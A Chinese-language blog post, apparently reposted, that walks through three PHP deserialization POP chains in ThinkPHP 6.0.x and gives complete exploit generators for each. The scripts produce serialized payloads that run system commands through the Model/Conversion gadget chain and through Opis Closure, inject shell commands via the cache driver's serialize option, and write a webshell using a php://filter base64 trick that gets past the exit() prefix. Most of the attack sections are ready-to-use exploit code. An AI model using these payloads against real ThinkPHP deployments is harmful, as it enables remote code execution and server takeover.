2. 程式人生 > 實用技巧 >thinkphp 6.0.x pop鏈

thinkphp 6.0.x pop鏈

阿新 發佈:2020-09-09

pop1

thinkphp v5.2.x 反序列化利用鏈挖掘
thinkphp v6.0.x 反序列化利用鏈挖掘

think\Model->__destruct()

/vendor/topthink/think-orm/src/Model.php

__destruct()
$this->save()
$result = $this->exists ? $this->updateData() : $this->insertData($sequence);
$allowFields = $this->checkAllowFields();
$query = $this->db();

終於看到字串拼接

$query = self::$db->connect($this->connection)
            ->name($this->name . $this->suffix)
            ->pk($this->pk);

think\model\concern\Conversion->__toString()

vendor/topthink/think-orm/src/model/concern/Conversion.php

__toString()
$this->toJson()
json_encode($this->toArray(), $options);

elseif (!isset($this->hidden[$key]) && !$hasVisible) {
    $item[$key] = $this->getAttr($key);
}

return $this->getValue($name, $value, $relation);

$value   = $closure($value, $this->data);

可以動態呼叫函式,但是引數是有限制的,接下來一種方法是找能用的php函式,一種是利用\Opis\Closure呼叫匿名函式

method1

system函式可以傳遞兩個引數,第二個引數接收外部命令執行後的返回狀態,不會影響執行,所以可以直接getshell

<?php
namespace think\model\concern;
trait Conversion
{
}

trait Attribute
{
    private $data = ["sy1j" => "dir"];
    private $withAttr = ["sy1j" => "system"];
}

namespace think;
abstract class Model{
    use model\concern\Attribute;
    use model\concern\Conversion;
    private $lazySave = true;
    protected $withEvent = false;
    private $exists = true;
    private $force = true;
    protected $field = [];
    protected $schema = [];
    protected $connection='mysql';
    protected $name;
    protected $suffix = '';

}

namespace think\model;
use think\Model;

class Pivot extends Model
{
    function __construct($obj = '')
    {
        $this->name = $obj;
    }
}
$a = new Pivot();
$b = new Pivot($a);

echo urlencode(base64_encode(serialize($b)));

method2

\Opis\Closure可用於序列化匿名函式,使得匿名函式同樣可以進行序列化操作。這意味著我們可以序列化一個匿名函式,然後交由上述的$closure($value, $this->data)呼叫執行。

<?php

namespace Opis\Closure;
include "D:/xampp/htdocs/tp6/vendor/opis/closure/src/SerializableClosure.php";
include "D:/xampp/htdocs/tp6/vendor/opis/closure/src/ClosureScope.php";
include "D:/xampp/htdocs/tp6/vendor/opis/closure/src/ReflectionClosure.php";
include "D:/xampp/htdocs/tp6/vendor/opis/closure/src/ClosureStream.php";


namespace think\model\concern;
trait Conversion
{
}

trait Attribute
{
    private $data = ["sy1j" => "dir"];
    private $withAttr;
    public function setAttr($closure){
        $this->withAttr = $closure;
    }
}

namespace think;
abstract class Model{
    use model\concern\Attribute;
    use model\concern\Conversion;
    private $lazySave = true;
    protected $withEvent = false;
    private $exists = true;
    private $force = true;
    protected $field = [];
    protected $schema = [];
    protected $connection='mysql';
    protected $name;
    protected $suffix = '';

}

namespace think\model;
use think\Model;

class Pivot extends Model
{
    function __construct($obj = '', $closure="system")
    {
        $this->name = $obj;
        $this->setAttr(["sy1j"=>$closure]);
    }
}
$a = new Pivot();
$func = function(){phpinfo();};
$closure = new \Opis\Closure\SerializableClosure($func);
$b = new Pivot($a, $closure);

echo urlencode(base64_encode(serialize($b)));

pop2

ThinkPHP 6.x反序列化POP鏈(二)

League\Flysystem\Cached\Storage\AbstractCache->__destruct

public function __destruct()
{
    if (! $this->autosave) {
        $this->save();
    }
}

因為是抽象類,所以要find usages,找到think\filesystem\CacheStore

public function save()
{
    $contents = $this->getForStorage();

    $this->store->set($this->key, $contents, $this->expire);
}

store可控,可以走__call,也可以直接找實現set方法的類,找到think\cache\driver\File->set()

$data = $this->serialize($value);

serialize函式可以直接利用

protected function serialize($data): string
{
    if (is_numeric($data)) {
        return (string) $data;
    }

    $serialize = $this->options['serialize'][0] ?? "serialize";

    return $serialize($data);
}

不過最$data的來源是$value$value來自CacheStore->save()裡的$content,如下得到,所以內容是經過了json_encode

public function getForStorage()
{
    $cleaned = $this->cleanContents($this->cache);

    return json_encode([$cleaned, $this->complete]);
}

要執行命令必須使用反引號或者windows下&

exp

<?php

namespace League\Flysystem\Cached\Storage {
    abstract class AbstractCache
    {
        protected $autosave = false;
//        protected $complete = "`id`";
        protected $complete = "\"&dir&";
// 在Windows環境中反引號無效,用&替代
    }
}

namespace think\filesystem {

    use League\Flysystem\Cached\Storage\AbstractCache;

    class CacheStore extends AbstractCache
    {
        protected $key = "1";
        protected $store;

        public function __construct($store = "")
        {
            $this->store = $store;
        }
    }
}

namespace think\cache {
    abstract class Driver
    {
        protected $options = ["serialize" => ["system"], "expire" => 1, "prefix" => "1", "hash_type" => "sha256", "cache_subdir" => "1", "path" => "1"];
    }
}

namespace think\cache\driver {

    use think\cache\Driver;

    class File extends Driver
    {
    }
}

namespace {
    $file = new think\cache\driver\File();
    $cache = new think\filesystem\CacheStore($file);
    echo base64_encode(serialize($cache));
}
?>

寫shell

也可以再往下走兩行,會有

$data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
$result = file_put_contents($filename, $data);

經典“死亡exit”,比較簡單的,偽協議繞繞就行了,最後檔名是$key的md5

<?php
namespace League\Flysystem\Cached\Storage{
    abstract class AbstractCache
    {
        protected $autosave = false;
        protected $complete = "uuuPD9waHAgcGhwaW5mbygpOw==";
    }
}
namespace think\filesystem{
    use League\Flysystem\Cached\Storage\AbstractCache;
    class CacheStore extends AbstractCache
    {
        protected $key = "1";
        protected $store;
        public function __construct($store="")
        {
            $this->store = $store;
        }
    }
}
namespace think\cache{
    abstract class Driver
    {
        protected $options = ["serialize"=>["trim"],"expire"=>1,"prefix"=>false,"hash_type"=>"md5","cache_subdir"=>false,"path"=>"php://filter/write=convert.base64-decode/resource=d:/xampp/htdocs/tp6/public/","data_compress"=>0];
    }
}
// 路徑最好寫成絕對路徑
namespace think\cache\driver{
    use think\cache\Driver;
    class File extends Driver{}
}
namespace{
    $file = new think\cache\driver\File();
    $cache = new think\filesystem\CacheStore($file);
    echo base64_encode(serialize($cache));
}
?>

pop3

和上面差不多,寫shell

<?php
namespace League\Flysystem\Cached\Storage{
    abstract class AbstractCache
    {
        protected $autosave = false;
        protected $cache = ["<?php phpinfo(); ?>"];
    }

    class Adapter extends AbstractCache
    {
        protected $file;
        protected $adapter;
        protected $expire;
        public function __construct($adapter="")
        {
            $this->file = "d:/xampp/htdocs/tp6/public/shell.php";
// 需要根據系統以及配置修改路徑寫法
            $this->adapter = $adapter;
        }
    }
}
namespace League\Flysystem\Adapter{
    class Local
    {
        protected $writeFlags = 0;
    }
}
namespace{
    $local = new League\Flysystem\Adapter\Local();
    $cache = new League\Flysystem\Cached\Storage\Adapter($local);
    echo urlencode(base64_encode(serialize($cache)));
//    echo serialize($cache);
}
?>

相關推薦

thinkphp 6.0.x pop

pop1 thinkphp v5.2.x 反序列化利用挖掘 thinkphp v6.0.x 反序列化利用挖掘 think\\Model->__destruct()

ThinkPHP 6.0 基礎教程 - 安裝

ThinkPHP6.0 的環境: PHP >= 7.1.0 我本地環境: Win10 PhpStudy 安裝 PhpStudy 如果你已經安裝 PhpStudy 或其他環境,請忽略這裡

linux(ubuntu 20.10):安裝composer 2.0.8及thinkphp 6.0.5(php 7.4.9)

一,安裝前的準備工作 1,檢視當前的php版本: root@ku:/data/php# php --version PHP 7.4.9 (cli) (built: Oct 26 2020 15:17:14) ( NTS )

Thinkphp 6.0 layout公共模板使用

技術標籤:thinkphp6.0thinkphpphp ①,view目錄下新建public資料夾,在public下新建layout.html②,layout.html內:

thinkphp6:訪問redis6(thinkphp 6.0.9/php 8.0.14)

一,在.env中配置redis資訊: [REDIS0] TYPE = redis HOST = 127.0.0.1 PORT = 6379 PASSWORD = 說明:劉巨集締的架構森林是一個專注架構的部落格,地址:https://www.cnblogs.com/architectforest

echarts5.0 x軸為時間軸(time),按6小時 12小時 24小時分割

技術標籤:Echarts不知道為什麼 如圖 一:6小時分割 intervalNum =12 xAxis: { type: "time",

SpringCloud升級之路2020.0.x版-6.微服務特性相關的依賴說明

本系列程式碼地址:https://github.com/HashZhang/spring-cloud-scaffold/tree/master/spring-cloud-iiford

【HMS Core 6.0全球上線】Network Kit全路網路加速技術,應用無懼網路擁塞

HMS Core 6.0已於7月15日全球上線,本次版本向廣大開發者開放了眾多全新能力與技術。其中HMS Core Network Kit開放了全路網路加速技術,助力開發者為使用者提供低時延的暢快網路體驗。

(實戰專案篇)vue3.0系列(vue2.6-cli3.x) axio的封裝和使用

(實戰專案篇)vue3.0系列(vue2.6-cli3.x) axio的封裝和使用 request.js import axios from \'axios\'

MySQL不同版本多例項(5.6.X,5.7.X,8.0.X)

1.1 準備工作 1.1.1 建立資料目錄 mkdir -p /data/335{6..7}/data chown -R mysql.mysql /data/ ls -ld /data/335*

SpringCloud升級之路2020.0.x版-43.為何 SpringCloudGateway 中會有路資訊丟失

本系列程式碼地址:https://github.com/JoJoTec/spring-cloud-parent 在開始編寫我們自己的日誌 Filter 之前,還有一個問題我想在這裡和大家分享,即在 Spring Cloud Gateway 中可能發生路資訊丟失的問題。

thinkphp6: 用imagemagick庫生成縮圖(ImageMagick 6.9.11-60 / php 8.1.1 / thinkphp v6.0.10LTS )

一,安裝ImageMagick庫: 1,apt-get安裝 root@lhdpc:~# apt-get install imagemagick 2,檢視版本: root@lhdpc:~# convert --version

Android超清晰6.0許可權申請AndPermission

Android超清晰6.0許可權申請AndPermission的具體實現程式碼,供大家參考,具體內容如下

linux安裝mysql 8.0.x的完整步驟

MySQL MySQL簡介 MySQL原本是一個開放原始碼的關係資料庫管理系統,原開發者為瑞典的MySQL AB公司,該公司於2008年被昇陽微系統(Sun Microsystems)收購。2009年,甲骨文公司(Oracle)收購昇陽微系統公司,MySQL

mysql8.0.x建立使用者及授權

一,mysql8.x建立使用者及授權 mysql> use mysql; 建立資料庫 mysql> create database db_demo;

6.springboot2.X整合redis-cache-shiro

1.案例中shrio 邏輯認證會頻繁的查詢資料庫,消耗效能 2.改造一下,把之前學習的快取中介軟體拿來用

android studio 3.6.0 繫結檢視新特性的方法

Android studio 3.6.0 繫結檢視使用方法 1.確保你的 build gradle 最低為3.6.0 dependencies {classpath \'com.android.tools.build:gradle:3.6.0\'

esxi 6.0 u3 安裝 Windows 10 1909 無法使用遠端桌面訪問

因為一些相容性的原因esxi的版本一直停留在6.0前段時間安裝了Window 10 1909的虛擬機器,發現無法通過遠端桌面登入(RDP)。使用遠端桌面登入時控制檯的會話被鎖定,遠端桌面黑屏沒有反應,一會後顯示“由於協議錯誤

c# 6.0 特性

前言 遷移以前的筆記。 正文 只讀屬性初始化 static string Hello => @"Hello world,Lind!"; //static string Hello{get;}

Linux安裝Redis 6.0.5 ./install_server.sh報錯

Linux安裝Redis 6.0.5./install_server.sh報錯 linux 安裝Redis6.0.5時 進行到./install_server.sh時報錯,